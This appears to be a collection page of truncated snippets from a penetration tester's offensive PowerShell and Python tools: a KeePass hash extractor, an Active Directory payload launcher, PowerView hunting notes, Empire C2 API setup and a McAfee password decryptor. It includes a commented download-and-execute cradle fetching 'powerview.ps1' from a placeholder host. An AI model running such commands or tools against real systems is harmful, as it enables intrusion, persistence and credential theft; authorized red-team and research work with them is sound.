#!/usr/bin/python | |
# Python port of keepass2john from the John the Ripper suite (http://www.openwall.com/john/) | |
# ./keepass2john.c was written by Dhiru Kholia <dhiru.kholia at gmail.com> in March of 2012 | |
# ./keepass2john.c was released under the GNU General Public License | |
# source keepass2john.c source code from: http://fossies.org/linux/john/src/keepass2john.c | |
# | |
# Python port by @harmj0y, GNU General Public License | |
# |
function ConvertTo-Rc4ByteStream { | |
<# | |
.SYNOPSIS | |
Converts an input byte array to a RC4 cipher stream using the specified key. | |
Author: @harmj0y | |
License: BSD 3-Clause | |
Required Dependencies: None | |
Optional Dependencies: None |
#Requires -Version 2 | |
function New-ADPayload { | |
<# | |
.SYNOPSIS | |
Stores PowerShell logic in the mSMQSignCertificates of the specified -TriggerAccount and generates | |
a one-line launcher. | |
Author: @harmj0y |
Show remote branches:
git branch -v -a
To check out a remote branch (see http://stackoverflow.com/questions/1783405/checkout-remote-git-branch):
git fetch
git checkout <branch>
Get all zones:
Get-WmiObject MicrosoftDNS_Zone -Namespace Root\MicrosoftDNS -ComputerName primary.testlab.local | Select ContainerName
Get all A records from a zone:
Get-WmiObject -Namespace Root\MicrosoftDNS -Query "SELECT * FROM MicrosoftDNS_ResourceRecord WHERE ContainerName='testlab.local'" -ComputerName primary.testlab.local | ?{$_.TextRepresentation -match " A "} | Select -Expand TextRepresentation
# Import PowerView into memory without touching disk | |
# IEX (New-Object Net.WebClient).DownloadString('http://HOST/powerview.ps1') | |
################################### | |
# Hunting for Users | |
################################### | |
# search for administrator groups |
$GroupData = @{} | |
$UserData = @{} | |
$ServerData = @{} | |
Import-CSV .\DomainGroups.csv | ForEach-Object { | |
if($GroupData[$_.GroupName]) { | |
$_.GroupName = $GroupData[$_.GroupName] | |
} | |
else { | |
$guid = ([guid]::NewGuid()).Guid |
# start empire headless with the specified API username and password | |
# NOTE(review): the password is given on the command line, so it is visible to
# other local users through the process list and may be recorded in shell
# history; prefer an interactive prompt or a protected file if the tool allows it.
./empire --headless --username empireadmin --password 'Password123!' | |
# login and the current server token | |
# NOTE(review): --insecure disables TLS certificate verification. That is only
# tolerable here because the endpoint is https://localhost; do not carry the flag
# over to a remote host. The credentials in -d have the same argv/history exposure
# as above.
curl --insecure -i -H "Content-Type: application/json" https://localhost:1337/api/admin/login -X POST -d '{"username":"empireadmin", "password":"Password123!"}' | |
# store the token in a variable | |
# <API_token> is a placeholder: substitute the token value returned by the login
# call above (the session token is a credential — avoid echoing or logging it).
TOKEN=<API_token> | |
# see listener options |
Function Start-FileSystemMonitor { | |
<# | |
.SYNOPSIS | |
This function will monitor one or more file paths for any file | |
creation, deletion, modification, or renaming events. Data including | |
the change type, ACL for the file, etc. is output to the screen or | |
a specified -LogFile. | |
If -InjectShellCmd is specified, the given command is inserted into |
function Get-DecryptedSitelistPassword { | |
# PowerShell adaptation of https://github.com/funoverip/mcafee-sitelist-pwd-decryption/ | |
# Original Author: Jerome Nokin (@funoverip / jerome.nokin@gmail.com) | |
# port by @harmj0y | |
[CmdletBinding()] | |
Param ( | |
[Parameter(Mandatory = $True)] | |
[String] | |
$B64Pass | |
) |